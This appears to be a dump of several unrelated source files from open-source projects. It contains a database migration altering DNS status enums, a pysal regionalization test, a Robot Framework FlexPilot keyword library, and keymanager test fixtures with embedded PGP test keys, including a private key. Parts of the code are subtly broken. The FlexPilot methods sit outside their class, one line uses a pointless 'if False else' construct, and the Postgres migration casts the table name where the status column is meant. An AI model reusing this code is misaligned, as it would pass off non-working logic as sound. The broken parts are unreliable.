    through sqlalchemy-migrate's column alter.
    """
    meta.bind = migrate_engine

    RESOURCE_STATUSES = ['ACTIVE', 'PENDING', 'DELETED', 'ERROR']

    # Get associated database tables
    domains_table = Table('domains', meta, autoload=True)
    records_table = Table('records', meta, autoload=True)

    dialect = migrate_engine.url.get_dialect().name
    if dialect.startswith("postgresql"):
        # Rename the existing enum type, then append the new value.
        # ADD VALUE runs on an AUTOCOMMIT connection — presumably because
        # Postgres disallows it inside a transaction block; verify against
        # the targeted PG version.
        migrate_engine.execute(
            "ALTER TYPE domain_statuses RENAME TO resource_statuses;")
        with migrate_engine.connect() as conn:
            conn.execution_options(isolation_level="AUTOCOMMIT")
            conn.execute(
                "ALTER TYPE resource_statuses ADD VALUE 'ERROR' "
                "AFTER 'DELETED'")
            conn.close()

    actions = Enum(name='actions', metadata=meta, *ACTIONS)
    actions.create()

    resource_statuses = Enum(name='resource_statuses', metadata=meta,
                             *RESOURCE_STATUSES)

    # Upgrade the domains table.
    domains_table.c.status.alter(
        type=resource_statuses,
        default='PENDING', server_default='PENDING')
    action_column = Column('action', actions,
                           default='CREATE', server_default='CREATE',
                           nullable=False)
    action_column.create(domains_table)

    # Re-add constraint for sqlite.
    if dialect.startswith('sqlite'):
        constraint = UniqueConstraint(
            'name', 'deleted', name='unique_domain_name', table=domains_table)
        constraint.create()

    # Upgrade the records table.
    if dialect.startswith("postgresql"):
        # Convert the records status column to the shared type and drop the
        # now-unused record_statuses enum.
        sql = "ALTER TABLE records ALTER COLUMN status DROP DEFAULT, " \
              "ALTER COLUMN status TYPE resource_statuses USING " \
              "records::text::resource_statuses, ALTER COLUMN status " \
              "SET DEFAULT 'PENDING';"
        migrate_engine.execute(sql)
        record_statuses = Enum(name='record_statuses', metadata=meta,
                               *RESOURCE_STATUSES)
        record_statuses.drop()
    else:
        records_table.c.status.alter(
            type=resource_statuses,
            default='PENDING', server_default='PENDING')

    action_column = Column('action', actions,
                           default='CREATE', server_default='CREATE',
                           nullable=False)
    action_column.create(records_table)

    serial_column = Column('serial', Integer(), server_default='1',
                           nullable=False)
    serial_column.create(records_table)

    # Re-add constraint for sqlite.
    if dialect.startswith('sqlite'):
        constraint = UniqueConstraint(
            'hash', name='unique_record', table=records_table)
        constraint.create()
def downgrade(migrate_engine):
    # No downgrade implemented: the enum/column changes in upgrade() are
    # not reversed, so this migration is effectively one-way.
    pass
| apache-2.0 |
chhao91/pysal | pysal/region/tests/test_maxp.py | 8 | 1754 |
import unittest
import pysal
import numpy as np
import random
class Test_Maxp(unittest.TestCase):
    """Regression tests for pysal's Maxp regionalization with seeded RNGs."""

    def setUp(self):
        # Fix both RNGs so region assignments are reproducible.
        random.seed(100)
        np.random.seed(100)

    def testMaxp(self):
        """Maxp on a 10x10 lattice should reproduce the seeded solution."""
        w = pysal.lat2W(10, 10)
        z = np.random.random_sample((w.n, 2))
        p = np.ones((w.n, 1), float)
        floor = 3
        solution = pysal.region.Maxp(
            w, z, floor, floor_variable=p, initial=100)
        # assertEqual/assertAlmostEqual: the *Equals spellings are
        # deprecated aliases, removed in Python 3.12.
        self.assertEqual(solution.p, 29)
        self.assertEqual(solution.regions[0], [4, 14, 5, 24, 3])
    # Keep the original camel-case name callable for any external reference.
    test_Maxp = testMaxp

    def test_inference(self):
        """Permutation-based inference should give the seeded p-value."""
        w = pysal.weights.lat2W(5, 5)
        z = np.random.random_sample((w.n, 2))
        p = np.ones((w.n, 1), float)
        floor = 3
        solution = pysal.region.Maxp(
            w, z, floor, floor_variable=p, initial=100)
        solution.inference(nperm=9)
        self.assertAlmostEqual(solution.pvalue, 0.20000000000000001, 10)

    def test_cinference(self):
        """Constrained inference should give the seeded p-value."""
        w = pysal.weights.lat2W(5, 5)
        z = np.random.random_sample((w.n, 2))
        p = np.ones((w.n, 1), float)
        floor = 3
        solution = pysal.region.Maxp(
            w, z, floor, floor_variable=p, initial=100)
        solution.cinference(nperm=9, maxiter=100)
        self.assertAlmostEqual(solution.cpvalue, 0.10000000000000001, 10)

    def test_Maxp_LISA(self):
        """Maxp_LISA should reproduce the seeded region count and members."""
        w = pysal.lat2W(10, 10)
        z = np.random.random_sample((w.n, 2))
        p = np.ones(w.n)
        mpl = pysal.region.Maxp_LISA(w, z, p, floor=3, floor_variable=p)
        self.assertEqual(mpl.p, 31)
        self.assertEqual(mpl.regions[0], [99, 89, 98])
# Build a suite so the module can be run directly as well as collected by a
# larger test runner.
suite = unittest.TestLoader().loadTestsFromTestCase(Test_Maxp)

if __name__ == '__main__':
    runner = unittest.TextTestRunner()
    runner.run(suite)
| bsd-3-clause |
mebusw/robotframework-selenium2library-flexpilot | src/Selenium2LibraryFlexPilot/keywords/_flashcontroller.py | 1 | 5188 | from robot.libraries.BuiltIn import BuiltIn
# from selenium.webdriver.common.action_chains import ActionChains
class _FlashControllerKeywords:
    '''Keywords for driving Flex applications through FlexPilot.

    Locator examples:
    `name:testText*rea/name:U*TextField*`
    `window.document.getElementById('loginApp').fp_type({name:'password_field', text:'mode'});`
    '''

    def __init__(self):
        # DOM id of the currently selected Flex application; set by
        # select_flex_application (and wait_for_flex_ready as a fallback).
        self._flex_app = None

    @property
    def s2l(self):
        # The live Selenium2Library instance, resolved via Robot Framework's
        # BuiltIn so we always use the library the suite imported.
        return BuiltIn().get_library_instance('Selenium2Library')

    # Recognized "prefix=" forms for locators; the first entry's name is the
    # default when no prefix is present.
    _flex_element_locators = ['id=', 'name=', 'automationName=', 'label=',
                              'text=', 'htmlText=', 'chain=']
    _flex_select_locators = ['label=', 'index=', 'text=', 'data=', 'value=']
def select_flex_application(self, dom_locator):
    """Selects Flex application to work with and waits until it is active.

    All further Flex keywords will operate on the selected application and
    thus you *must always* use this keyword before them. You must also use
    this keyword when you want to operate another Flex application.

    Because this keyword waits until the selected application is active,
    it is recommended to use this if the page where the application is
    located is reloaded. The timeout used is the same Selenium timeout that
    can be set in `importing` and with `Set Selenium Timeout` keyword.

    The application is found using `dom_locator` that must be either `id` or
    `name` of the application in HTML. Notice that if you have different
    elements for different browsers (<object> vs. <embed>), you need to
    use different attributes depending on the browser.

    The old dom_locator is returned and can be used to switch back to the
    previous application.

    Example:
    | Select Flex Application | exampleFlexApp |
    | Click Flex Element | myButton |
    | ${prev app} | = Select Flex Application | secondFlexApp |
    | Flex Element Text Should Be | Hello, Flex! |
    | Select Flex Application | ${prev app} |
    """
    # TODO to find a default flex_obj_id if none
    # (this.browserbot.locateElementByXPath('//embed', this.browserbot.getDocument())) ? this.browserbot.locateElementByXPath('//embed', this.browserbot.getDocument()) : this.browserbot.locateElementByXPath('//object', this.browserbot.getDocument()).id
    # Swap in the new application id while keeping the previous one so the
    # caller can restore it later.
    self._flex_app, old = dom_locator, self._flex_app
    if dom_locator:
        # Fail fast if the element isn't even on the page.
        self.page_should_contain_element(dom_locator) if False else \
            self.s2l.page_should_contain_element(dom_locator)
        # It seems that Selenium timeout is used regardless what's given here
        # TODO self._selenium.do_command("waitForFlexReady", [dom_locator, self._timeout])
    return old
def wait_for_flex_ready(self, dom_locator, timeout=5):
    """Waits until an element is found by `dom_locator` or `timeout` expires.

    Readiness is detected by checking that the FlexPilot API (fp_click) is
    exposed on the element. If no application has been selected yet, the
    located one becomes the current application.
    """
    self.s2l._info("Waiting %s for element '%s' to appear" % (timeout, dom_locator))
    error = "Element '%s' did not appear in <TIMEOUT>" % dom_locator
    self.s2l.wait_until_page_contains_element(dom_locator)
    self.s2l._wait_until(timeout, error, self._flex_ready, dom_locator)
    # Idiom fix: compare to None with 'is', not '=='.
    if self._flex_app is None:
        self._flex_app = dom_locator
def _flex_ready(self, dom_locator):
    """Return True once the element exposes the FlexPilot fp_click API."""
    try:
        js = "return window.document.getElementById('%s').fp_click" % dom_locator
        ret = self.s2l.execute_javascript(js)
    except Exception as e:  # was Py2-only "except Exception, e" syntax
        # The element (or its FlexPilot hook) isn't available yet.
        self.s2l._debug(e)
        return False
    else:
        return ret is not None
def click_flex_element(self, locator):
    """ Clicks display object.
    """
    # Delegates to FlexPilot's fp_click with the parsed locator.
    return self._do_command("fp_click({%s});", locator)
def input_text_into_flex_element(self, locator, text):
    """Types `text` into the display object found by the locator lookup.
    """
    # NOTE(review): `text` is interpolated into a JS string literal without
    # escaping; quotes in `text` would break the expression — confirm inputs.
    return self._do_command("fp_type({%s, text:'%s'});", locator, text)
def flex_element_should_exist(self, locator):
    """assert a display object exists, `locator`
    """
    # Delegates the assertion to FlexPilot's fp_assertDisplayObject.
    return self._do_command("fp_assertDisplayObject({%s});", locator)
def _do_command(self, command, locator=None, *args):
    """Interpolate the parsed locator (and extra args) into *command* and
    execute it as JavaScript against the selected Flex application."""
    self.s2l._debug("Executing command '%s' for application '%s' with options '%s'"
                    % (command, self._flex_app, args))
    params = [self._split_flex_locator(locator)]
    params.extend(args)
    # command is a %-template, e.g. "fp_click({%s});"; js_header targets the
    # current application element.
    js = self.js_header + (command % tuple(params))
    return self.s2l.execute_javascript(js)
def _split_flex_locator(self, locator, prefixes=_flex_element_locators):
    """Parse a "prefix=value" locator into a "'prefix':'value'" JS fragment.

    When no known prefix is present, the first entry of *prefixes* (minus
    its '=') is used as the default key and the whole locator is the value.
    """
    selected_prefix = prefixes[0][:-1]
    selected_value = locator
    for prefix in prefixes:
        if locator.startswith(prefix):
            # BUG FIX: split only on the first '=' so values that
            # themselves contain '=' are preserved intact.
            selected_prefix, selected_value = locator.split('=', 1)
            break
    ret = "'%s':'%s'" % (selected_prefix, selected_value)
    self.s2l._info(ret)
    return ret
@property
def js_header(self):
    # JavaScript prelude that targets the currently selected Flex
    # application element; command fragments are appended to this.
    return "return window.document.getElementById('%s')." % self._flex_app
| apache-2.0 |
kalikaneko/bitmask-dev | tests/integration/keymanager/common.py | 1 | 14100 | # -*- coding: utf-8 -*-
# test_keymanager.py
# Copyright (C) 2013 LEAP
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Base classes for the Key Manager tests.
"""
import distutils.spawn
import os.path
from twisted.internet.defer import gatherResults
from twisted.trial import unittest
from leap.common.testing.basetest import BaseLeapTest
from leap.bitmask.keymanager import KeyManager
from leap.soledad.client import Soledad
PATH = os.path.dirname(os.path.realpath(__file__))  # directory of this test module
# E-mail addresses of the two fixture users whose PGP keys are embedded below.
ADDRESS = 'leap@leap.se'
ADDRESS_2 = 'anotheruser@leap.se'
# key 24D18DDF: public key "Leap Test Key <leap@leap.se>"
KEY_FINGERPRINT = "E36E738D69173C13D709E44F2F455E2824D18DDF"
PUBLIC_KEY = """
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
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
=MuOY
-----END PGP PUBLIC KEY BLOCK-----
"""
PRIVATE_KEY = """
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
lQcYBFC9+dkBEADNRfwV23TWEoGc/x0wWH1P7PlXt8MnC2Z1kKaKKmfnglVrpOiz
iLWoiU58sfZ0L5vHkzXHXCBf6Eiy/EtUIvdiWAn+yASJ1mk5jZTBKO/WMAHD8wTO
zpMsFmWyg3xc4DkmFa9KQ5EVU0o/nqPeyQxNMQN7px5pPwrJtJFmPxnxm+aDkPYx
irDmz/4DeDNqXliazGJKw7efqBdlwTHkl9Akw2gwy178pmsKwHHEMOBOFFvX61AT
huKqHYmlCGSliwbrJppTG7jc1/ls3itrK+CWTg4txREkSpEVmfcASvw/ZqLbjgfs
d/INMwXnR9U81O8+7LT6yw/ca4ppcFoJD7/XJbkRiML6+bJ4Dakiy6i727BzV17g
wI1zqNvm5rAhtALKfACha6YO43aJzairO4II1wxVHvRDHZn2IuKDDephQ3Ii7/vb
hUOf6XCSmchkAcpKXUOvbxm1yfB1LRa64mMc2RcZxf4mW7KQkulBsdV5QG2276lv
U2UUy2IutXcGP5nXC+f6sJJGJeEToKJ57yiO/VWJFjKN8SvP+7AYsQSqINUuEf6H
T5gCPCraGMkTUTPXrREvu7NOohU78q6zZNaL3GW8ai7eSeANSuQ8Vzffx7Wd8Y7i
Pw9sYj0SMFs1UgjbuL6pO5ueHh+qyumbtAq2K0Bci0kqOcU4E9fNtdiovQARAQAB
AA/+JHtlL39G1wsH9R6UEfUQJGXR9MiIiwZoKcnRB2o8+DS+OLjg0JOh8XehtuCs
E/8oGQKtQqa5bEIstX7IZoYmYFiUQi9LOzIblmp2vxOm+HKkxa4JszWci2/ZmC3t
KtaA4adl9XVnshoQ7pijuCMUKB3naBEOAxd8s9d/JeReGIYkJErdrnVfNk5N71Ds
FmH5Ll3XtEDvgBUQP3nkA6QFjpsaB94FHjL3gDwum/cxzj6pCglcvHOzEhfY0Ddb
J967FozQTaf2JW3O+w3LOqtcKWpq87B7+O61tVidQPSSuzPjCtFF0D2LC9R/Hpky
KTMQ6CaKja4MPhjwywd4QPcHGYSqjMpflvJqi+kYIt8psUK/YswWjnr3r4fbuqVY
VhtiHvnBHQjz135lUqWvEz4hM3Xpnxydx7aRlv5NlevK8+YIO5oFbWbGNTWsPZI5
jpoFBpSsnR1Q5tnvtNHauvoWV+XN2qAOBTG+/nEbDYH6Ak3aaE9jrpTdYh0CotYF
q7csANsDy3JvkAzeU6WnYpsHHaAjqOGyiZGsLej1UcXPFMosE/aUo4WQhiS8Zx2c
zOVKOi/X5vQ2GdNT9Qolz8AriwzsvFR+bxPzyd8V6ALwDsoXvwEYinYBKK8j0OPv
OOihSR6HVsuP9NUZNU9ewiGzte/+/r6pNXHvR7wTQ8EWLcEIAN6Zyrb0bHZTIlxt
VWur/Ht2mIZrBaO50qmM5RD3T5oXzWXi/pjLrIpBMfeZR9DWfwQwjYzwqi7pxtYx
nJvbMuY505rfnMoYxb4J+cpRXV8MS7Dr1vjjLVUC9KiwSbM3gg6emfd2yuA93ihv
Pe3mffzLIiQa4mRE3wtGcioC43nWuV2K2e1KjxeFg07JhrezA/1Cak505ab/tmvP
4YmjR5c44+yL/YcQ3HdFgs4mV+nVbptRXvRcPpolJsgxPccGNdvHhsoR4gwXMS3F
RRPD2z6x8xeN73Q4KH3bm01swQdwFBZbWVfmUGLxvN7leCdfs9+iFJyqHiCIB6Iv
mQfp8F0IAOwSo8JhWN+V1dwML4EkIrM8wUb4yecNLkyR6TpPH/qXx4PxVMC+vy6x
sCtjeHIwKE+9vqnlhd5zOYh7qYXEJtYwdeDDmDbL8oks1LFfd+FyAuZXY33DLwn0
cRYsr2OEZmaajqUB3NVmj3H4uJBN9+paFHyFSXrH68K1Fk2o3n+RSf2EiX+eICwI
L6rqoF5sSVUghBWdNegV7qfy4anwTQwrIMGjgU5S6PKW0Dr/3iO5z3qQpGPAj5OW
ATqPWkDICLbObPxD5cJlyyNE2wCA9VVc6/1d6w4EVwSq9h3/WTpATEreXXxTGptd
LNiTA1nmakBYNO2Iyo3djhaqBdWjk+EIAKtVEnJH9FAVwWOvaj1RoZMA5DnDMo7e
SnhrCXl8AL7Z1WInEaybasTJXn1uQ8xY52Ua4b8cbuEKRKzw/70NesFRoMLYoHTO
dyeszvhoDHberpGRTciVmpMu7Hyi33rM31K9epA4ib6QbbCHnxkWOZB+Bhgj1hJ8
xb4RBYWiWpAYcg0+DAC3w9gfxQhtUlZPIbmbrBmrVkO2GVGUj8kH6k4UV6kUHEGY
HQWQR0HcbKcXW81ZXCCD0l7ROuEWQtTe5Jw7dJ4/QFuqZnPutXVRNOZqpl6eRShw
7X2/a29VXBpmHA95a88rSQsL+qm7Fb3prqRmuMCtrUZgFz7HLSTuUMR867QcTGVh
cCBUZXN0IEtleSA8bGVhcEBsZWFwLnNlPokCNwQTAQgAIQUCUL352QIbAwULCQgH
AwUVCgkICwUWAgMBAAIeAQIXgAAKCRAvRV4oJNGN30+xEACh9yLkZ4jqW0/wwyIM
MI896MQf1tAwzMj16MJYUjrjNK4Bn57QaQW926HsxF8C/OjT0MTRhq7heYZJnnEo
rj0rzpkJapUveTRkKeoTRtGGigqJYfkOTU7KRVwgJBXIfaKlI3tC3cX0j0H1fVKX
hLxsj5pNSPRCVf2A5mePg44HtXe6oVWSJ8+EcdTa0shf03NhAtFaY0BbFGPSm9mA
QUe4rxugwXPLctIyV4uweFo5BXFBCb4kKTBdnQi3aJwnoWLNT6rDdTe4/nhY0Hfo
alTCYGLkhio77gBHwpTOjEMO/hZhcDMi4CvxMPw7bRxAwq4u+0j0pDhkiLcQs4U4
Ou/fH+pia+1nF5h19cNVXIm+RX2fL0wxVYc/14AIAK3YT6PVev9XYEkogSj0P7Kb
HKOruYpnToXJBERNJZwGL1U+ihPNUyroRf29t7u8flnXsOpCtBEIWAO8Muy5pWjV
3O6zAUCfWetAieCQ7WrQVmdJDa7dlX3Qx1XagUzqZdAq2jVI1hOWDA2rKytnReSF
/A97rmLaWZ8aoNCs8i4NLcy9Lbzi9QtornYGVCEmTTym0tM9L/mn7gAJ8dqUwt7n
s24dibfElky4ZZeItD+D7OZGeh0FDuejvv2dXFqL1/pkHpGBZhEckg0fZ95NbgMC
4pSZkZnqRpr2GwfB5aFfB6sIIJ0HGARQvfnZARAAtCP8Z9bm6KzIA7wbXx9LBIcJ
1wQvOPf99s4nOrnQev9xH5PZ820qS9xUjrlyE2bGYAhz5Cmq56ENs7THErIdZHtQ
uYEBprO+VFZjP50vtmCOL2PDl/xgv6J9r1Mp3KnR/m0esR+YceDW1qX07IkB5s+Q
us80v5LmmxnWcikWmR7dt1kOyV/+M6Y6mwvfQ4x3D/QUpO7SfMCOG5DGA7hVUHU/
Tuh8MihmMFFOLAEEQI+1wkxr1W09HaYCcB+EZqxLSaBwMeFoYPJie9dBNBgps39o
6pDbjsO+or4JNuyoHvh8NNI5iY0IR2NMlW4mqCcHEazys2koxFTYK6YD95Vz0RkA
K4BErCDk3lVR0PH4StmLU3gmPayIjvi9Dl9saPRyu4Xx2WVi+q6spl3ckn4c4f3+
iD8hxVp74+wa5ew0fIXjIpMoHCar/nndsse4i8glCddINdiOPPmhI9Wi3nT+5Z2t
9omPP2dEh0CzR+j1zvUpT3KtmhVICqhO+QP9BTJOwrp81NTlq9mbUyzTtVk/9dy3
zoYbhKvY08k6LJ9FsQYySqtfJZ4cwl5WsOhALWwOwlMLA9wkz0eemgFxStyOylzl
QKoIK7zHuU6XYOXa32KSPIWaLy+WgIG/u2ObWtdE3CXVIUuSt5BQFnv7XVNHJllD
Az9VDEkOSYOiSEFVoUsAEQEAAQAP/1AagnZQZyzHDEgw4QELAspYHCWLXE5aZInX
wTUJhK31IgIXNn9bJ0hFiSpQR2xeMs9oYtRuPOu0P8oOFMn4/z374fkjZy8QVY3e
PlL+3EUeqYtkMwlGNmVw5a/NbNuNfm5Darb7pEfbYd1gPcni4MAYw7R2SG/57GbC
9gucvspHIfOSfBNLBthDzmK8xEKe1yD2eimfc2T7IRYb6hmkYfeds5GsqvGI6mwI
85h4uUHWRc5JOlhVM6yX8hSWx0L60Z3DZLChmc8maWnFXd7C8eQ6P1azJJbW71Ih
7CoK0XW4LE82vlQurSRFgTwfl7wFYszW2bOzCuhHDDtYnwH86Nsu0DC78ZVRnvxn
E8Ke/AJgrdhIOo4UAyR+aZD2+2mKd7/waOUTUrUtTzc7i8N3YXGi/EIaNReBXaq+
ZNOp24BlFzRp+FCF/pptDW9HjPdiV09x0DgICmeZS4Gq/4vFFIahWctg52NGebT0
Idxngjj+xDtLaZlLQoOz0n5ByjO/Wi0ANmMv1sMKCHhGvdaSws2/PbMR2r4caj8m
KXpIgdinM/wUzHJ5pZyF2U/qejsRj8Kw8KH/tfX4JCLhiaP/mgeTuWGDHeZQERAT
xPmRFHaLP9/ZhvGNh6okIYtrKjWTLGoXvKLHcrKNisBLSq+P2WeFrlme1vjvJMo/
jPwLT5o9CADQmcbKZ+QQ1ZM9v99iDZol7SAMZX43JC019sx6GK0u6xouJBcLfeB4
OXacTgmSYdTa9RM9fbfVpti01tJ84LV2SyL/VJq/enJF4XQPSynT/tFTn1PAor6o
tEAAd8fjKdJ6LnD5wb92SPHfQfXqI84rFEO8rUNIE/1ErT6DYifDzVCbfD2KZdoF
cOSp7TpD77sY1bs74ocBX5ejKtd+aH99D78bJSMM4pSDZsIEwnomkBHTziubPwJb
OwnATy0LmSMAWOw5rKbsh5nfwCiUTM20xp0t5JeXd+wPVWbpWqI2EnkCEN+RJr9i
7dp/ymDQ+Yt5wrsN3NwoyiexPOG91WQVCADdErHsnglVZZq9Z8Wx7KwecGCUurJ2
H6lKudv5YOxPnAzqZS5HbpZd/nRTMZh2rdXCr5m2YOuewyYjvM757AkmUpM09zJX
MQ1S67/UX2y8/74TcRF97Ncx9HeELs92innBRXoFitnNguvcO6Esx4BTe1OdU6qR
ER3zAmVf22Le9ciXbu24DN4mleOH+OmBx7X2PqJSYW9GAMTsRB081R6EWKH7romQ
waxFrZ4DJzZ9ltyosEJn5F32StyLrFxpcrdLUoEaclZCv2qka7sZvi0EvovDVEBU
e10jOx9AOwf8Gj2ufhquQ6qgVYCzbP+YrodtkFrXRS3IsljIchj1M2ffB/0bfoUs
rtER9pLvYzCjBPg8IfGLw0o754Qbhh/ReplCRTusP/fQMybvCvfxreS3oyEriu/G
GufRomjewZ8EMHDIgUsLcYo2UHZsfF7tcazgxMGmMvazp4r8vpgrvW/8fIN/6Adu
tF+WjWDTvJLFJCe6O+BFJOWrssNrrra1zGtLC1s8s+Wfpe+bGPL5zpHeebGTwH1U
22eqgJArlEKxrfarz7W5+uHZJHSjF/K9ZvunLGD0n9GOPMpji3UO3zeM8IYoWn7E
/EWK1XbjnssNemeeTZ+sDh+qrD7BOi+vCX1IyBxbfqnQfJZvmcPWpruy1UsO+aIC
0GY8Jr3OL69dDQ21jueJAh8EGAEIAAkFAlC9+dkCGwwACgkQL0VeKCTRjd9HCw/+
LQSVgLLF4ulYlPCjWIIuQwrPbJfWUVVr2dPUFVM85DCv8gBzk5c121snXh9Swovm
laBbw6ate3BmbXLh64jVE9Za5sbTWi7PCcbO/bpRy4d6oLmitmNw6cq0vjTLxUYy
bwuiJxWREkfxuU85EKdouN062YDevH+/YResmlJrcCE7LRlJFeRlKsrrwBU3BqYd
GgFJjKjQC1peeQ9fj62Y7xfwE9+PXbkiWO5u/Bk8hb1VZH1SoIRU98NHVcp6BVvp
VK0jLAXuSauSczULmpRjbyt1lhaAqivDTWEEZXiNNbRyp17c3nVdPWOcgBr42hdQ
z25CgZgyLCsvu82wuXLKJblrIPJX3Yf+si6KqEWBsmwdOWybsjygaF5HvzgFqAAD
U0goPWoQ71PorP2XOUNp5ZLkBQp5etvtkksjVNMIhnHn8PGMuoxO39EUGlWj2B5l
Cu8tSosAzB1pS8NcLZzoNoI9dOHrmgJmP+GrOUkcf5GhNZbMoj4GNfGBRYX0SZlQ
GuDrwNKYj73C4MWyNnnUFyq8nDHJ/G1NpaF2hiof9RBL4PUU/f92JkceXPBXA8gL
Mz2ig1OButwPPLFGQhWqxXAGrsS3Ny+BhTJfnfIbbkaLLphBpDZm1D9XKbAUvdd1
RZXoH+FTg9UAW87eqU610npOkT6cRaBxaMK/mDtGNdc=
=JTFu
-----END PGP PRIVATE KEY BLOCK-----
"""
# key 7FEE575A: public key "anotheruser <anotheruser@leap.se>"
KEY_FINGERPRINT_2 = "F6E2B572ADB84EA58BD2E9A57F9DFA687FEE575A"
PUBLIC_KEY_2 = """
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
mI0EUYwJXgEEAMbTKHuPJ5/Gk34l9Z06f+0WCXTDXdte1UBoDtZ1erAbudgC4MOR
gquKqoj3Hhw0/ILqJ88GcOJmKK/bEoIAuKaqlzDF7UAYpOsPZZYmtRfPC2pTCnXq
